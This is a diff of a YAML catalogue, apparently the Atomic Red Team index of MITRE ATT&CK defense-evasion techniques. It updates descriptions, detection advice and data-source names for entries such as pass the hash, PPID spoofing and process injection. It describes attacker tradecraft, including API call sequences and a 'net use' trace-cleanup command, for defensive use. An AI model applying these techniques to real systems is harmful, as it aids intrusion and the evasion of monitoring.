privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) name: Msiexec created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: 
@@ -35405,6 +27873,18 @@ defense-evasion: url: https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/ description: Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019. + - source_name: Microsoft AlwaysInstallElevated 2018 + url: https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated + description: Microsoft. (2018, May 31). AlwaysInstallElevated. Retrieved December + 14, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-12-14T18:40:45.170Z' + created: '2020-01-24T14:38:49.266Z' + x_mitre_contributors: + - Alexandros Pappas x_mitre_platforms: - Windows x_mitre_detection: Use process monitoring to monitor the execution and arguments @@ -35419,11 +27899,12 @@ defense-evasion: x_mitre_permissions_required: - User x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_data_sources: - - DLL monitoring - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' identifier: T1218.007 atomic_tests: - name: Msiexec.exe - Execute Local MSI file 
@@ -35578,9 +28059,10 @@ defense-evasion: The Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014) x_mitre_data_sources: - - Process command-line parameters - - API monitoring - - File monitoring + - 'Process: OS API Execution' + - 'File: File Metadata' + - 'File: File Modification' + - 'Command: Command Execution' x_mitre_platforms: - Windows identifier: T1564.004 @@ -35748,8 +28230,8 @@ defense-evasion: x_mitre_platforms: - Network x_mitre_data_sources: - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: |- Consider monitoring network traffic on both interfaces of border network devices. Compare packets transmitted by the device between networks to look for signs of NAT being implemented. Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3. In some cases, Port Address Translation (PAT) may also be used by an adversary. @@ -35785,8 +28267,8 @@ defense-evasion: x_mitre_platforms: - Network x_mitre_data_sources: - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: |- Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question. Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device. 
@@ -35832,9 +28314,11 @@ defense-evasion: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-21T02:41:11.550Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:11:00.356Z' created: '2020-10-19T17:58:04.155Z' - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator @@ -35843,7 +28327,7 @@ defense-evasion: Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). x_mitre_data_sources: - - File monitoring + - 'File: File Modification' x_mitre_platforms: - Network atomic_tests: [] @@ -35861,9 +28345,9 @@ defense-evasion: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Network Share Connection Removal description: 'Adversaries may remove share connections that are no longer useful - in order to clean up traces of their operation. Windows shared drive and [Windows - Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be - removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) + in order to clean up traces of their operation. Windows shared drive and [SMB/Windows + Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can + be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\system\share /delete command. (Citation: Technet Net Use)' @@ -35872,7 +28356,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-01-31T12:39:18.816Z' + modified: '2021-02-09T13:31:01.970Z' created: '2020-01-31T12:39:18.816Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true 
@@ -35895,10 +28379,10 @@ defense-evasion: account, and can be used to correlate network share activity to other events to investigate potentially malicious activity. x_mitre_data_sources: - - Authentication logs - - Packet capture - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Network Traffic: Network Traffic Content' + - 'User Account: User Account Authentication' x_mitre_platforms: - Windows identifier: T1070.005 @@ -36029,7 +28513,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-09-16T19:24:20.601Z' + modified: '2021-04-24T13:19:18.594Z' created: '2017-05-31T21:30:32.662Z' x_mitre_is_subtechnique: false x_mitre_version: '1.1' @@ -36037,18 +28521,12 @@ defense-evasion: - Red Canary - Christiaan Beek, @ChristiaanBeek x_mitre_data_sources: - - Network protocol analysis - - Process use of network - - File monitoring - - Malware reverse engineering - - Binary file metadata - - Process command-line parameters - - Environment variable - - Process monitoring - - Windows event logs - - Network intrusion detection system - - Email gateway - - SSL/TLS inspection + - 'File: File Content' + - 'File: File Metadata' + - 'File: File Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Command: Command Execution' x_mitre_defense_bypassed: - Host forensic analysis - Signature-based detection @@ -36241,9 +28719,9 @@ defense-evasion: x_mitre_platforms: - Windows x_mitre_data_sources: - - Loaded DLLs - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' x_mitre_detection: Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially 
@@ -36329,7 +28807,7 @@ defense-evasion: description: |- Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018) - Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) + Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of 
[PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017) id: attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a @@ -36339,7 +28817,7 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-04-16T19:37:02.030Z' + modified: '2021-02-09T14:11:20.296Z' created: '2020-02-18T18:22:41.448Z' x_mitre_contributors: - Wayne Silva, F-Secure Countercept 
@@ -36356,9 +28834,9 @@ defense-evasion: Monitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible. x_mitre_data_sources: - - API monitoring - - Process monitoring - - Windows event logs + - 'Process: OS API Execution' + - 'Process: Process Creation' + - 'Process: Process Metadata' x_mitre_platforms: - Windows identifier: T1134.004 
@@ -36551,19 +29029,20 @@ defense-evasion: - external_id: CAPEC-644 source_name: capec url: https://capec.mitre.org/data/definitions/644.html - - source_name: NSA Spotting - description: National Security Agency/Central Security Service Information - Assurance Directorate. (2015, August 7). Spotting the Adversary with Windows - Event Log Monitoring. Retrieved September 6, 2018. - url: https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm + - source_name: Stealthbits Overpass-the-Hash + url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/ + description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash + Attacks. Retrieved February 4, 2021. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Pass the Hash description: |- - Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. + Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. 
This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. - Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.(Citation: NSA Spotting) + When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. + + Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash) id: attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e type: attack-pattern kill_chain_phases: 
@@ -36571,20 +29050,22 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-03-23T16:24:34.766Z' + modified: '2021-03-15T21:04:33.228Z' created: '2020-01-30T16:36:51.184Z' x_mitre_defense_bypassed: - System Access Controls - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true - x_mitre_detection: Audit all logon and credential use events and review for - discrepancies. Unusual remote logins that correlate with other suspicious - activity (such as writing and executing binaries) may indicate malicious activity. - NTLM LogonType 3 authentications that are not associated to a domain login - and are not anonymous logins are suspicious. + x_mitre_detection: |- + Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious. + + Event ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash) x_mitre_data_sources: - - Authentication logs + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + - 'Active Directory: Active Directory Credential Request' x_mitre_contributors: + - Blake Strom, Microsoft 365 Defender - Travis Smith, Tripwire x_mitre_platforms: - Windows 
@@ -36702,6 +29183,10 @@ defense-evasion: description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014. source_name: Campbell 2014 + - source_name: Stealthbits Overpass-the-Hash + url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/ + description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash + Attacks. Retrieved February 4, 2021. - url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017. 
@@ -36713,11 +29198,13 @@ defense-evasion: description: |- Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system. - In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket) + When preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. 
A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket) - [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks) + A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks) - [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014) + A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014) + + Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash) id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926 type: attack-pattern kill_chain_phases: 
@@ -36725,11 +29212,11 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-03-12T17:03:16.122Z' + modified: '2021-03-15T21:42:11.839Z' created: '2020-01-30T17:03:43.072Z' x_mitre_defense_bypassed: - System Access Controls - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_system_requirements: - Kerberos authentication enabled @@ -36738,7 +29225,9 @@ defense-evasion: Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection) x_mitre_data_sources: - - Authentication logs + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + - 'Active Directory: Active Directory Credential Request' x_mitre_contributors: - Vincent Le Toux - Ryan Becwar @@ -36823,11 +29312,14 @@ defense-evasion: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-25T20:59:05.209Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:11:55.147Z' created: '2020-02-11T19:05:45.829Z' x_mitre_data_sources: - - File monitoring - - DLL monitoring + - 'File: File Creation' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_contributors: - Vincent Le Toux x_mitre_permissions_required: 
@@ -36837,7 +29329,7 @@ defense-evasion: Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference. Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013) - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_platforms: - Windows @@ -36984,9 +29476,7 @@ defense-evasion: Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification) x_mitre_data_sources: - - Network device run-time memory - - Network device configuration - - File monitoring + - 'File: File Modification' x_mitre_platforms: - Network atomic_tests: [] @@ -37032,8 +29522,9 @@ defense-evasion: Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. x_mitre_data_sources: - - Process monitoring - - File monitoring + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_contributors: - Stefan Kanthak x_mitre_platforms: 
@@ -37091,8 +29582,9 @@ defense-evasion: x_mitre_contributors: - Stefan Kanthak x_mitre_data_sources: - - Process monitoring - - File monitoring + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_detection: | Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. @@ -37161,8 +29653,9 @@ defense-evasion: Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. x_mitre_data_sources: - - Process monitoring - - File monitoring + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_contributors: - Stefan Kanthak x_mitre_platforms: @@ -37240,9 +29733,11 @@ defense-evasion: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-07-13T21:23:01.370Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:12:34.422Z' created: '2020-06-26T04:01:09.648Z' - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: - root 
@@ -37251,8 +29746,8 @@ defense-evasion: Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). x_mitre_data_sources: - - Authentication logs - - File monitoring + - 'File: File Modification' + - 'Logon Session: Logon Session Creation' x_mitre_contributors: - Scott Knight, @sdotknight, VMware Carbon Black - George Allen, VMware Carbon Black @@ -37298,8 +29793,8 @@ defense-evasion: x_mitre_detection: Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows. x_mitre_data_sources: - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: - Linux - macOS 
@@ -37308,19 +29803,15 @@ defense-evasion: atomic_tests: [] T1055.002: technique: - external_references: - - source_name: mitre-attack - external_id: T1055.002 - url: https://attack.mitre.org/techniques/T1055/002 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Portable Executable Injection + created: '2020-01-14T01:27:31.344Z' + modified: '2020-11-10T18:29:30.882Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662 description: "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space 
@@ -37330,28 +29821,28 @@ defense-evasion: with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional - requirement for functionality to remap memory references. (Citation: Endgame + requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. " - id: attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:19:58.813Z' - created: '2020-01-14T01:27:31.344Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_data_sources: - - Process monitoring - - API monitoring - x_mitre_permissions_required: - - User + name: Portable Executable Injection + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1055.002 + url: https://attack.mitre.org/techniques/T1055/002 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' 
+ source_name: Elastic Process Injection July 2017 + x_mitre_platforms: + - Windows + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances @@ -37359,14 +29850,18 @@ defense-evasion: common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, - may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze + may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_defense_bypassed: + - Anti-virus + - Application control atomic_tests: [] T1542: technique: @@ -37404,14 +29899,12 @@ defense-evasion: - Windows - Network x_mitre_data_sources: - - VBR - - MBR - - Component firmware - - Process monitoring - - Disk forensics - - EFI - - BIOS - - API monitoring + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' + - 'Firmware: Firmware Modification' + - 'Driver: Driver Metadata' + - 'Process: OS API Execution' + - 'Drive: Drive Modification' x_mitre_permissions_required: - Administrator - SYSTEM 
@@ -37462,14 +29955,14 @@ defense-evasion: hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux - Injection)(Citation: DD Man) \n\nOther techniques such as [LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006) - may be used to populate a target process with more available gadgets. Similar - to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc - memory injection may target child processes (such as a backgrounded copy of - sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of - another process may allow access to the process's memory, system/network resources, - and possibly elevated privileges. Execution via proc memory injection may - also evade detection from security products since the execution is masked + Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker + Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate + a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), + proc memory injection may target child processes (such as a backgrounded copy + of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context + of another process may allow access to the process's memory, system/network + resources, and possibly elevated privileges. Execution via proc memory injection + may also evade detection from security products since the execution is masked under a legitimate process. " id: attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591 type: attack-pattern 
@@ -37484,8 +29977,7 @@ defense-evasion: - Application control - Anti-virus x_mitre_data_sources: - - Process monitoring - - File monitoring + - 'File: File Modification' x_mitre_detection: "File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. \n\nAnalyze process behavior to determine if a process is performing actions @@ -37545,7 +30037,7 @@ defense-evasion: the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nAdversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). - Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), + Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored @@ -37570,15 +30062,14 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-06-20T22:27:21.304Z' + modified: '2021-02-09T15:43:48.848Z' created: '2020-01-14T17:19:50.978Z' x_mitre_defense_bypassed: - Anti-virus - Application control x_mitre_data_sources: - - File monitoring - - Process monitoring - - API monitoring + - 'Process: OS API Execution' + - 'File: File Metadata' x_mitre_permissions_required: - Administrator - SYSTEM 
@@ -37608,7 +30099,7 @@ defense-evasion: description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 + source_name: Elastic Process Injection July 2017 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -37625,7 +30116,7 @@ defense-evasion: \ before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: - Endgame Process Injection July 2017)\n\nThis is very similar to [Thread Local + Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from @@ -37639,14 +30130,14 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-06-20T22:28:08.758Z' + modified: '2020-11-10T18:29:31.031Z' created: '2020-01-14T17:21:54.470Z' x_mitre_defense_bypassed: - Application control - Anti-virus x_mitre_data_sources: - - Process monitoring - - API monitoring + - 'Process: OS API Execution' + - 'Process: Process Access' x_mitre_permissions_required: - User x_mitre_detection: "Monitoring Windows API calls indicative of the various types 
@@ -37657,7 +30148,7 @@ defense-evasion: such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for - this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze + this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. " 
